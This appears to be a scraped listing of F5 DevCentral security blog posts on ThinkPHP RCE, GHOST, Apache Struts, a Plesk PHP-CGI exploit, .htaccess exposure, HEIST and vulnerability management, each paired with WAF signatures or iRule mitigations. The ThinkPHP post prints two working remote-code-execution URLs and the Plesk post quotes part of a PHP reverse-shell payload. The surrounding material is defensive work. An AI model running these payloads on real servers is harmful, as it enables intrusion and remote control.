vulnerability
17 TopicsThinkPHP 5.x Remote Code Execution Vulnerability
ThinkPHP is an open source PHP development framework for agile web application development. The framework is vastly adopted worldwide, a quick Shodan search shows more than40,000 active deployments. Recently, an unauthenticated remote code execution vulnerability was discovered in ThinkPHP, which was quickly adopted by large amount of threat actors who started scanning for vulnerable instances. The root cause of the vulnerability is the way that ThinkPHP parses the requested controller and executes the requested function. The patch committed to the Github repository by the maintainers showed that a regular expression validating the supplied controller name was added. Figure 1: Vulnerability patched by adding a Regular expression that validates the supplied controller name The reason for this addition is because ThinkPHP receives the requested module, controller and function to execute within a query parameter and splits it by using the ‘/’ character as a delimiter. Figure 2: ThinkPHP splits the received string in order to get the module and controller names Once ThinkPHP parsed the controller name and function, it first creates an instance of the supplied controller name by using reflection and then executes the requested function. Figure 3: ThinkPHP creates an instance of the requested controller and executes the requested function The two publicly disclosed vectors leading to arbitrary command execution are attempting to load a valid class of ThinkPHP. The two payloads are: http://thinkphp/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l http://thinkphp/public/index.php?s=/index/\think\request/cache&key=ls%20-l|system The first attack vector will attempt to execute the “invokeFunction” method of the ThinkPHP App class, which allows specifying an arbitrary function to execute and passes the required arguments for this function. Figure 4: invokeFunction method of ThinkPHP App class The second attack vector attempts to execute the cache function of ThinkPHP Request class which attempts to split between a function name and parameter by using the ‘|’ character as delimiter. And, it later attempts to execute the function with its parameters. Figure 5: cache method of ThinkPHP Request class Mitigating the vulnerability with BIG-IP ASM BIG-IP ASM customers under any supported BIG-IP version are already protected against this vulnerability. The exploitation attempt will be detected by a dedicated attack signature recently released to mitigate the mentioned exploitation attempts which can be found in signature sets that include the “Server Side Code Injection” attack type or the “PHP” system. Figure 6: Exploitation attempt blocked by signature id 200004481 Advanced WAF customers with Threat Intelligence subscription are protected with the following Threat Campaigns: - ThinkPHP Remote Code Execution - HelloThinkPHP - ThinkPHP Remote Code Execution - curl zz3.8KViews0likes0CommentsVirtual Patching: What is it and why you should be doing it
Yesterday I was privileged to co-host a webinar with WhiteHat Security's Jeremiah Grossman on preventing SQL injection and Cross-Site scripting using a technique called "virtual patching". While I was familiar with F5's partnership with WhiteHat and our integrated solution, I wasn't familiar with the term. Virtual patching should put an end to the endless religious warring that goes on between the secure coding and web application firewall camps whenever the topic of web application security is raised. The premise of virtual patching is that a web application firewall is not, I repeat is not a replacement for secure coding. It is, in fact, an augmentation of existing security systems and practices that, in fact, enables secure development to occur without being rushed or outright ignored in favor of rushing a fix out the door. "The remediation challenges most organizations face are the time consuming process of allocating the proper personnel, prioritizing the tasks, QA / regression testing the fix, and finally scheduling a production release." -- WhiteHat Security, "WhiteHat Website Security Statistic Reports", December 2008 The WhiteHat report goes on to discuss the average number of days it took for organizations to address the top five urgent - not critical, not high, but urgent - severity vulnerabilities discovered. The fewest number of days to resolve a vulnerability (SQL Injection) was 28 in 2008, which is actually an improvement over previous years. 28 days. That's a lifetime on the Internet when your site is vulnerable to exploitation and attackers are massing at the gates faster than ants to a picnic. But you can't rush finding and fixing the vulnerability, and the option to shut down the web application may not be an option at all, especially if you rely on that application as a revenue stream, as an integration point with partners, or as part of a critical business process with a strict SLA governing its uptime. So do you leave it vulnerable? According to White Hat's data, apparently that's the decision made for many organizations given the limited options. The heads of many security professionals just exploded. My apologies if any of the detritus mussed your screen. If you're one of the ones whose head is still intact, there is a solution. Virtual patching provides the means by which you can prevent the exploitation of the vulnerability while it is addressed through whatever organizational processes are required to resolve it. Virtual patching is essentially the process of putting in place a rule on a web application firewall to prevent the exploitation of a vulnerability. This process is often times a manual one, but in the case of WhiteHat and F5 the process has been made as easy as clicking a button. When WhiteHat's Sentinel, which provides vulnerability scanning as a service, uncovers a vulnerability the operator (that's you) can decide to virtually patch the hole by adding a rule to the appropriate policy on F5's BIG-IP Application Security Manager (ASM) with the click of a button. Once the vulnerability has been addressed, you can remove the rule from the policy or leave it in place, as is your wont. It's up to you. Virtual patching provides the opportunity to close a vulnerability quickly but doesn't require that you necessarily abandon secure coding practices. Virtual patching actual enables and encourages secure coding by giving developers some breathing room in which to implement a thorough, secure solution to the vulnerability. It isn't an either-or solution, it's both, and leverages both solutions to provide the most comprehensive security coverage possible. And given statistics regarding the number of sites infected of late, that's something everyone should be able to get behind. Virtual patching as a technique does not require WhiteHat or F5, but other solutions will require a manual process to put in place rules to address vulnerabilities. The advantage of a WhiteHat-F5 solution is its tight integration via iControl and ability to immediately close discovered security holes, and of course a lengthy list of cool security options and features to further secure web applications available with ASM. You can read more about the integration between WhiteHat and F5 here or here or view a short overview of the way virtual patching works between Sentinel and ASM.1.7KViews0likes2CommentsGHOST Vulnerability (CVE-2015-0235)
On 27 of January Qualys publisheda critical vulnerability dubbed “GHOST” as it can be triggered by the GetHOST functions ( gethostbyname*() ) of the glibc library shipping with the Linux kernel. Glibc is the main library of C language functionality and is present on most linux distributions. Those functions are used to get a corresponding structure out of a supplied hostname, while it also performs a DNS lookup if the hostname is a domain name and not an IP address. The vulnerable functions are obsolete however are still in use by many popular applications such as Apache, MySQL, Nginx and Node.js. Presently this vulnerability was proven to be remotely exploited for the Exim mail service only, while arbitrary code execution on any other system using those vulnerable functions is very context-dependent. Qualys mentioned through a security email list, the applications that were investigated but found to not contain the buffer overflow. Read more on the email list archive link below: http://seclists.org/oss-sec/2015/q1/283 Currently, F5 is not aware of any vulnerable web application, although PHP applications might be potentially vulnerable due to its “gethostbyname()” equivalent. UPDATE: WordPress content management system using xml-rpc ping back functionality was found to be vulnerable to the GHOST vulnerability. WordPress automatically notifies popular Update Services that you've updated your blog by sending aXML-RPCpingeach time you create or update a post. By sending a specially crafted hostname as paramter of xml-rpc ping back method the vulnerable Wordpress will return "500" HTTP response or no response at all after resulting in memory corruption. However, no exploitability was proven yet. Using ASM to Mitigate WordPress GHOST exploit As the crafted hostname should be around 1000 characters to trigger the vulnerability, limiting request size will mitigate the threat. Add the following user defined attack signature to detect and prevent potential exploitation of this specific vulnerability for WordPress systems. For version greater than 11.2.x: uricontent:"xmlrpc.php"; objonly; nocase; content:"methodcall"; nocase; re2:"/https?://(?:.*?)?[\d\.]{500}/i"; For versions below 11.2.x: uricontent:"xmlrpc.php"; objonly; nocase; content:"methodcall"; nocase; pcre:"/https?://(?:.*?)?[\d\.]{500}/i"; This signature will catch any request to the "xmlrpc.php" URL which contains IPv4 format hostname greater than 500 characters. iRule Mitigation for Exim GHOST exploit At this time, only Exim mail servers are known to be exploitable remotely if configured to verify hosts after EHLO/HELO command in an SMTP session. If you run the Exim mail server behind a BigIP, the following iRule will detect and mitigate exploitation attempts: when CLIENT_ACCEPTED { TCP::collect } when CLIENT_DATA { if { ( [string toupper [TCP::payload]] starts_with "HELO " or [string toupper [TCP::payload]] starts_with "EHLO " ) and ( [TCP::payload length] > 1000 ) } { log local0. "Detected GHOST exploitation attempt" TCP::close } TCP::release TCP::collect } This iRule will catch any HELO/EHLO command greater than 1000 bytes. Create a new iRule and attach it to your virtual server.1.4KViews0likes7Comments90 Seconds of Security: What is CVE and CVSS?
Security researchers at F5 monitor web traffic 24/7 at locations around the world and the F5 Security Incident Response Team (SIRT) helps customers tackle incident response in real time. And when they find a new vulnerability, it’ll often get a Common Vulnerability & Exposures number like CVE-2019-1105 for the ‘Outlook for Android Spoofing Vulnerability’. Created in 1999, the CVE provides definitions for all publicly knowncybersecurity vulnerabilitiesandexposures. So, gimmie 90 Seconds to understand a little bit about the Common Vulnerability & Exposures. Now that we’ve looked at how vulnerabilities become CVEs, let’s explain how a CVE gets scored. The Common Vulnerability Scoring System or CVSS was introduced in 2005 as an open framework for communicating the characteristics and severity of software vulnerabilities. It consists of three metric groups: Base, Temporal, and Environmental. Once again, let’s start the clock to understand a little bit about the Common Vulnerability Scoring System. Hope that was helpful and you can catch the entire 90 Seconds Series on F5's YouTube Channel. ps1.1KViews0likes0CommentsMitigating The Apache Struts ClassLoader Manipulation Vulnerabilities Using ASM
Background Recently the F5 security research team has witnessed a series of CVE’s created for the popular Apache Struts platform. From Wikipedia: Apache Struts was an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model–view–controller (MVC) architecture. It was originally created by Craig McClanahan and donated to the Apache Foundation in May, 2000. Formerly located under the Apache Jakarta Project and known as Jakarta Struts, it became a top-level Apache project in 2005. The initial CVE-2014-0094 disclosed a critical vulnerability that allows an attacker to manipulate ClassLoader by using the ‘class’ parameter, which is directly mapped to the getClass() method through the ParametersInterceptor module in the Struts framework. The Apache Struts security bulletin recommended upgrading to Struts 2.3.16.1 to mitigate the vulnerability. Alternatively, users were also able to mitigate this vulnerability using a configuration change on their current Struts installations. The mitigation included adding the following regular expression to the list of disallowed parameters in ParametersInterceptor: '^class\.*' After several weeks, the solution was found to be incomplete, and sparked four new CVE’s: CVE-2014-0112, CVE-2014-0113, CVE-2014-0114 and CVE-2014-0116. Note: During the initial release of this article, CVE-2014-0114 andCVE-2014-0116 were not yet publicly disclosed, and weren't mentioned in this article. The article has now been edited to include mitigation for these CVEs as well. CVE-2014-0112 mentions the ClassLoader vulnerability still existing in parameters, and the security advisory for it suggests a new regular expression to include in the ParametersInterceptor config: (.*\.816Views0likes0CommentsPlesk Vulnerability
Recently we’ve witnessed another example of a relatively old and specific vulnerability come to life using a very common and wide spread application. In this case it was the CVE-2012-1823 vulnerability, being exploited using the Plesk admin panel. This vulnerability allows remote code execution by using a bug in the PHP CGI wrapper, which allows injecting CGI options to the executable, as well as piping other shell commands. Plesk is a tool that allows automated deployment and centralized management of various system services such as: Web hosting, DNS and E-Mail. It is a widely used application, popular amongst independent SMB’s. This “out in the wild” code-execution exploit attempts to upload PHP code onto the server, using the aforementioned vulnerability in the CGI module. Code injection is possible thanks to query data being passed unescaped directly to shell. This allows passing options to the CGI binary such as –r (execute code) and –d (define ini). In addition, command line pipe-lining is also possible because the entire argument is declared unquoted: #!/bin/sh exec /dh/cgi-system/php5.cgi $* By simply reviewing the source code of the exploit, no particular sophistication or elaborate attack pattern was found. It is a straight forward attack vector with PHP code in body, and CGI parameters in query. This part of the exploit sets the PHP-CGI flags: As we can see, the –d flag is used to declare some config line directives, and the –n flag to bypass the local php.ini. Then the payload is being sent, which is a PHP page that sets up a shell with a socket:. $pwn="<?php echo \"Content-Type: text/plain\r\n\r\n\";set_time_limit (0); \$VERSION = \"1.0\"; \$ip ='$lip'; \$port = $lport; \$chunk_size = 1400; \$write_a = null;\$error_a = null; \$shell = '/bin/sh -i'; \$daemon = ... Issuing the exploit against an updated ASM version triggered the following signatures: 200004025 - PHP injection attempt ( <? ) 200004038 - PHP injection attempt ( posix_setsid ) 200100310 - "/bin" execution attempt (Parameter) 200100310 - Shell command (sh/ksh/etc) access (Value) 200100330 - PHP-CGI Shell Code Injection (v2) 200002437 - SQL-INJ "if(Expression,value,value)" (Parameter) The PHP and CGI signatures are quite expected, as well as the other command execution ones. As for the SQL-INJ signature, it could be considered a false positive since this attack was not SQL Injection. However, since the format of this signature resembles execution code as well as an SQL query – it is understandable why the PHP code located in the payload has triggered this signature.799Views0likes0CommentsI Can Has UR .htaccess File
Notice that isn’t a question, it’s a statement of fact Twitter is having a bad month. After it was blamed, albeit incorrectly, for a breach leading to the disclosure of both personal and corporate information via Google’s GMail and Apps, its apparent willingness to allow anyone and everyone access to a .htaccess file ostensibly protecting search.twitter.com made the rounds via, ironically, Twitter. This vulnerability at first glance appears fairly innocuous, until you realize just how much information can be placed in an .htaccess file that could have been exposed by this technical configuration faux pas. Included in the .htaccess file is a number of URI rewrites, which give an interesting view of the underlying file system hierarchy Twitter is using, as well as a (rather) lengthy list of IP addresses denied access. All in all, not that exciting, because many of the juicy bits that could be configured via .htaccess for any given website are not done so in this easily accessible .htaccess file. Some things you can do with .htaccess, in case you aren’t familiar: Create default error document Enable SSI via htaccess Deny users by IP Change your default directory page Redirects Prevent hotlinking of your images Prevent directory listing .htaccess is a very versatile little file, capable of handling all sorts of security and application delivery tasks. Now what’s interesting is that the .htaccess file is in the root directory and should not be accessible. Apache configuration files are fairly straight forward, and there are plethora examples of how to prevent .htaccess – and its wealth of information – from being viewed by clients. Obfuscation, of course, is one possibility, as Apache’s httpd.conf allows you to specify the name of the access file with a simple directive: AccessFileName .htaccess It is a simple enough thing to change the name of the file, thus making it more difficult for automated scans to discover vulnerable access files and retrieve them. A little addition to the httpd.conf regarding the accessibility of such files, too, will prevent curious folks from poking at .htaccess and retrieving them with ease. After all, there is no reason for an access file to be viewed by a client; it’s a server-side security configuration mechanism, meant only for the web server, and should not be exposed given the potential for leaking a lot of information that could lead to a more serious breach in security. ~ "^\.ht"> Order allow,deny Deny from all Satisfy All Another option, if you have an intermediary enabled with network-side scripting, is to prevent access to any .htaccess file across your entire infrastructure. Changes to httpd.conf must be done on every server, so if you have a lot of servers to manage and protect it’s quite possible you’d miss one due to the sheer volume of servers to slog through. Using a network-side scripting solution eliminates that possibility because it’s one change that can immediately affect all servers. Here’s an example using an iRule, but you should also be able to use mod_rewrite to accomplish the same thing if you’re using an Apache-based proxy: when HTTP_REQUEST { # Check the requested URI switch -glob [string tolower [HTTP::path]] { "/.ht*" { reject } default { pool bigwebpool } } } However you choose to protect that .htaccess file, just do it. This isn’t rocket science, it’s a straight-up simple configuration error that could potentially lead to more serious breaches in security – especially if your .htaccess file contains more sensitive (and informative) information. An Unhackable Server is Still Vulnerable Twittergate Reveals E-Mail is Bigger Security Risk than Twitter Automatically Removing Cookies Clickjacking Protection Using X-FRAME-OPTIONS Available for Firefox Stop brute force listing of HTTP OPTIONS with network-side scripting Jedi Mind Tricks: HTTP Request Smuggling I am in your HTTP headers, attacking your application Understanding network-side scripting700Views0likes4CommentsLightboard Lessons: OWASP Top 10 - Using Components With Known Vulnerabilities
The OWASP Top 10 is a list of the most common security risks on the Internet today. The #9riskin the latest edition of the OWASP Top 10 is "Using Components With Known Vulnerabilities". It may seem obvious that you wouldn't want to use components in your web application that have known vulnerabilities, but it's easier said than done. In this video, John discusses this problemand outlines some mitigation steps to make sure your web application stays secure. Related Resources: Securing against the OWASP Top 10: Using Components With Known Vulnerabilities Common Vulnerabilities and Exposures(CVE)Database National Vulnerability Database (NVD)625Views0likes0CommentsHEIST Vulnerability – Overview and BIG-IP Mitigation
An interesting topic was talked about in the recent Black Hat conference. It is a new attack called HEIST (HTTP Encrypted Information can be Stolen through TCP-windows) which demonstrates how to extract sensitive data from any authenticated cross-origin website. What makes this attack unique is the ability to execute without any sort of traffic eavesdropping or man-in-the-middle scenarios. The attack happens in the browser, upon visiting an attacker-controlled website. Basics of a HEIST The HEIST attack, as described by Leuven University researchers Mathy Vanhoef and Tom Van Goethem, makes use of a new browser feature called Service Workers and specifically a new interface called Fetch API. The Fetch API, much like XMLHttpRequest (XHR), allows for arbitrary requests to be sent from the browser. These requests may also include sensitive authorization information such as session cookies. It is obviously not so trivial to read the responses from requests sent by Fetch API or XHR, due to the Same-origin Policy (SOP) enforced by the browser. However, it may be possible to use side channel attacks to infer information about the size of the response and in certain circumstances even extract personal data. No Empty Promises The attack uses the Fetch API and its performance measuring tool. Shortly after an arbitrary request is sent using Fetch API, the browser creates a Promise object in the DOM. This object is created once the browser starts receiving data from the server. A “responseEnd” attribute is added to the object once the browser fully receives the entire data. The “patent” of the attack is knowing whether the response consisted of either one TCP packet, or more. That is by measuring the time between the Promise object creation and “responseEnd”. This allows the attacker to detect an approximate size of any page, as it appears to the victim. For pages that reflect user-input data, the attacker may detect the exact size of the response. Can I (Ab)Use? Service Workers are supported in the following browsers: This table shows that a rather large majority of browsers in the market today already support Service Workers. The trend is expected to grow as Service Workers are useful with creating dynamic and responsive web applications. Source: http://caniuse.com/#feat=serviceworkers Call the Police! In this section we’ll go over possible mitigations, including solutions available for BIG-IP users. Disable third-party cookies The researchers list disabling third-party cookies as the only real mitigation for this attack. By disabling this functionality, the browser won’t send authorization information in Fetch API and XHR requests made to cross-origin domains. Pros: Completely disables the attack. Cons: The setting happens in the browser. Web servers cannot enforce this setting upon users. Also, it is unclear what functionality may be hampered by disabling third-party cookies. Applying data in varying lengths to responses The researchers also list this action as a possible mitigation. The idea is to add data at random lengths to every response. This will considerably affect the attacker’s ability to understand what is the actual response length. The original attack requires up to 14 requests in order to detect the exact response length. By adding random data in different possible lengths, the attacker may have to work much harder and be more aggressive towards the web server. The following is an iRule that adds this functionality to BIG-IP virtual servers: when HTTP_RESPONSE { set sRandomString {} set iLength [expr {int(rand() * 1000 + 1)}] for {set i 0} {$i < $iLength} {incr i} { set iRandomNum [expr {int(rand() * 62)}] if {$iRandomNum < 10} { incr iRandomNum 48 } elseif {$iRandomNum < 36} { incr iRandomNum 55 } else { incr iRandomNum 61 } append sRandomString [format %c $iRandomNum] } HTTP::header insert X-HEIST $sRandomString log local0. "Added random header X-HEIST: $sRandomString" } This iRule will add a random string as a response header called “X-HEIST”. The string length ranges between 1 and 1000 chars. Pros: Adds significant complexity to the attack, possibly until the point that it is no longer feasible. Cons: Doesn’t completely shut down the vulnerability. In some cases, where the exact response length isn’t interesting to the attacker – this approach alone may be less effective. Block unknown origins Fetch API and XHR requests often add a request header that describes from which domain the request originated. For example, an XHR request in a script that runs on “http://attacker.com” will add the following request header: Origin: attacker.com The Origin header is not meant to be used as an access list for security needs. However, it is generally good practice to only allow known domains to be able to send Fetch API or XHR requests. This configuration is available in BIG-IP ASM (version 11.5.0 and up), under Security >> Application Security : URLs : Allowed URLs : Allowed HTTP URLs >> Allowed HTTP URL Properties: Pros: A request with an unknown Origin will be blocked by ASM, disallowing the browser from performing this attack. Cons: It may be challenging for website admins to create an allowlist of accepted domains. For public APIs it is often desired to allow all origins. In addition, there are some cases where the Origin header isn’t added to the request. Web Scraping protection Enabling Web Scraping protection in ASM may prevent this attack. Web Scraping protection is configurable under Security >> Application Security : Anomaly Detection : Web Scraping. Combining this protection with the iRule mentioned above creates adequate mitigation for this attack. By adding length randomization, the amount of requests the attacker must send is significantly increased. This will trigger Web Scraping detection in ASM once it is enabled. Furthermore, during the attack period the browser will fail answering the JavaScript challenges sent by ASM and therefore not receive the desired result from the server. Conclusion The HEIST attack is a unique and original form of attack. It uses legitimate functionality like cross-origin requests, and is based on known variables such as TCP slow start algorithm defaults. The attack uses side channel to retrieve data from cross-origin sources, despite the SOP protection found in browsers. As the researchers claim, the only real effective mitigation to this attack is disabling third-party cookies in the browser. However, using ASM and iRules we’ve shown that it’s possible to effectively mitigate this 0-day vulnerability using the tools and protections already found in BIG-IP.510Views0likes0CommentsManaging Your Vulnerabilities
I recently recovered from ACDF surgery where they remove a herniated or degenerative disc in the neck and fuse the cervical bones above and below the disk. My body had a huge vulnerability where one good shove or fender bender could have ruptured my spinal cord. I had some items removed and added some hardware and now my risk of injury is greatly reduced. Breaches are occurring at a record pace, botnets are consuming IoT devices and bandwidth, and the cloud is becoming a de-facto standard for many companies. Vulnerabilities are often found at the intersection of all three of these trends, so vulnerability and risk management has never been a greater or more critical challenge for organizations. Vulnerabilities come in all shapes and sizes but one thing that stays constant – at least in computer security - is that a vulnerability is a weakness which allows an attacker to reduce a system’s information assurance. It is the intersection where a system is susceptible to a flaw; whether an attacker can access that flaw; and whether an attacker can exploit that flaw within the system. For F5, it means an issue that results in a confidentiality, integrity, or availability impact of an F5 device by an unauthorized source. Something that affects the critical F5 system functions - like passing traffic. You may be familiar with CVE or Common Vulnerabilities and Exposures. This is a dictionary of publicly known information security vulnerabilities and exposures. Each vulnerability or exposure gets a name or CVE ID and allows organizations to reference it in a public way. It enables data exchange between security products and provides a baseline index point for evaluating coverage of tools and services. MITRE is the organization that assigns CVEs. There are also CVE Numbering Authorities (CNA). Instead of sending a vulnerability to MITRE for numbering, a CNA gets a block of numbers and can assign IDs as needed. The total CVE IDs is around 79,398. Most organizations are concerned about CVEs and the potential risk if one is present in their environment. This is obviously growing with the daily barrage of hacks, breaches and information leaks. Organizations can uncover vulnerabilities from scanner results; from media coverage like Heartbleed, Shellshock, Poodle and others; or from the various security related standards, compliance or internal processes. The key is that scanning results need to be verified for false positives, hyped vulnerabilities might not be as critical as the headline claims and what the CVE might mean for your compliance or internal management. For F5, we keep a close eye on any 3 rd party code that might be used in our systems. OpenSSL, BIND or MySQL are examples. For any software, there may be bugs or researcher’s reports or even non-CVE vulnerabilities that could compromise the system. Organizations need to understand the applicability, impact and mitigation available. Simply put: Am I affected? How bad is it? What can I do? With Applicability, research typically determines if an organization should care about the vulnerability. Things like, is the version of software noted and are you running it. Are you running the vulnerable function within the software? Sometimes older or non-supported versions might be vulnerable but you’ve upgraded to the latest supported code or you are simply not using the vulnerable function at all. The context is also important. Is it being used in default, standard or recommended mode? For instance, many people don’t change the default password of their Wi-Fi device and certain functionality is vulnerable. It gets compromised and becomes part of a botnet. But if the password was changed, as recommended, and it becomes compromised some other way, then that is a different situation to address. For Impact, there are a couple ways to decide how bad it is. First, you can look at the severity of the vulnerability - is it low, medium, high or critical. You can also see if there is a Common Vulnerability Scoring System (CVSS) score tied to the vulnerability. The CVSS score can give you a gauge to the overall risk. To go a bit deeper, you can look at the CVSS Vector. There are 3 sections to the CVSS. There are the constant base metrics covering the exploitability of the issue, the impact that it may have and the scope that it is in. There are the temporal metrics, which may change over time, giving the color commentary of the issue. And there are the environmental metrics which look at the specific, individual environment and how that is impacted. Areas explored here include things like the attack vector and complexity; whether elevated privileges are required or any user interaction along with the scope and how it affects the confidentiality, integrity and availability of the system. One can use the CVSS calculator to help determine a vector score. With a few selections you can get a base, temporal and environmental score to get an overall view of the severity. With this, you can get an understanding as to how to handle the vulnerability. Every organization has different levels of risk based on their unique situation. The vulnerability base score may have a critical listing yet based on your environmental score, the severity and risk may be nil. Lastly, the Mitigation taken is not an exact science and truly depends on the issue and the organization’s situation. Mitigation is not necessarily prevention. For example, compensating controls, such as restricting root level access might mean that a vulnerability simply isn’t exploitable without a privileged account. Vulnerability management and information security is about managing risk. Risk analysis, risk management, risk mitigation and what that risk means to the business. Patching a vulnerability can introduce other risks, so the old refrain of “patch your $#!+” is not the panacea we’re often led to believe. Risk is not limited to the severity of the vulnerability alone, but also to the required vector for exploiting that vulnerability where it exists within a specific organization’s infrastructure. It’s important to understand your risk and focus on the important pieces. ps346Views0likes0Comments